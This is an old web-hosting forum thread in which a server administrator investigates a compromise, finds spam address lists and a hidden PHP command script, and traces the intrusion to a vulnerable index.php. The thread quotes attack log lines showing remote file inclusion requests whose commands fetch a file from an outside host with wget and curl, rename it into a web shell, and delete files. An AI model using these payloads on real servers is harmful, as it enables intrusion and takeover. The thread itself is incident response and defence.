The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

possibly hacked ?

Discussion in 'General Discussion' started by ctbhost, Jul 30, 2005.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    in my /tmp directory there was a folder named /.x whitch contained the following files

    failed.txt
    Norte11.txt
    Norte12.txt
    Norte13.txt
    Norte14.txt
    ocarteiro.htm
    ocarteiro.txt
    ok.txt

    the Nortel files contained lists of email addresses,

    what i was wondering is how could these files be placed on the server and where, if anywhere in the loggs can i trace the source of the hacker

    i have deleted the files and the folder from the server but really want to know what i can do to stop this happening again.

    about 6 months ago i secured my server using the information in this thread http://forums.cpanel.net/showthread.php?t=30159 and the instruction on http://eth0.us/

    maybe there is something else i need to do
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
  3. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    thanks for that - i found a php script called .admin.php that allows the user to execute commands on the users home directory.

    only problem is the script was created the day before the loggs stsrt so i cant seem to see how it was uploaded.
     
  4. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    in my error_log i found a heap of lines like this

    i have BFD and APF installed - shouldnt BFD blocked this ip address due to so many failed attempts in such a short time ??

    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:00 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:08 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
     
  5. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
    BFD should have stopped that. as a quick heed,

    touch /home/avi/public_html/403.shtml

    as root on shell. aleast u will save the bandwidth.
     
  6. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    yeh i understand what your saying but im more interested in why BFD didnt pick it up - is there a way to check that bfd is working ??
     
  7. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,192
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    Root Administrator
    had it had worked, you wouldnt have got so many access in the logs.

    in case you wanna test, you will need to write a script that access a particular file say 100 times in a loop and see if bdf pcks it up.

    alternatively i shld say that mod_dosevasive is very effective to prevent dos.
     
  8. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    seems that APF isnt working

    i try to to restart apf with apf -r

    and i get the error below - any idea what this means

    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
     
  9. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    found the problem
    in /etc/apf/deny_hosts.rules there was the blocked ip list and one called 'at' i removed that and all fixed
     
  10. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    i have figured out how the hacker is getting in but how do i stop them.
    in the logs there are the following entries

    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;pwd HTTP/1.1" 200 10112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;rm%20-rf%20.index.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;wget%20www.lolsys.org/admin.txt HTTP/1.1" 200 10128 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;curl%20-o%20admin.txt%20www.lolsys.org/admin.txt HTTP/1.1" 200 10365 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;mv%20admin.txt%20.look.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /ice/.look.php?password=aihdffa HTTP/1.1" 200 1116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    if it enter these in the brouser after the domain name i get a page that has
    ------------------------------------------------------------------
    Sidewinder Command/Safemode Exploit 4.1


    System Information
    sysname: Linux
    nodename: [my host name]
    Release: 2.4.22-1.2199.nptl
    version: #1 Wed Aug 4 12:25:07 EDT 2004
    machine: i686

    Script Current User: USERNANME
    PHP Version: 5.0.4
    User Info: uid(32020) euid(32020) gid(522)
    Current Path: /home/user/public_html
    Server IP: xxx.xxx.xxx.xxx
    Web Server: Apache


    [*] Command Mode Run
    Command Stdout
    ------------------------------------------------------------

    any idea how to protect against this type of attack

    would not allowing the string http:// in the "?show=" variable be enough or is there a better way
     
  11. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    You need to remove and then fix whatever that index.php script is. It's clearly exploitable.
     
  12. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    yeh have found the problem - was written when i was real new to PHP and open to exploit - i have put some extra scruipting in to not allow various charactors that should stop them

    just gota wrk out why BFD isnt working
     
    #12 ctbhost, Aug 9, 2005
    Last edited: Aug 9, 2005
Loading...

Share This Page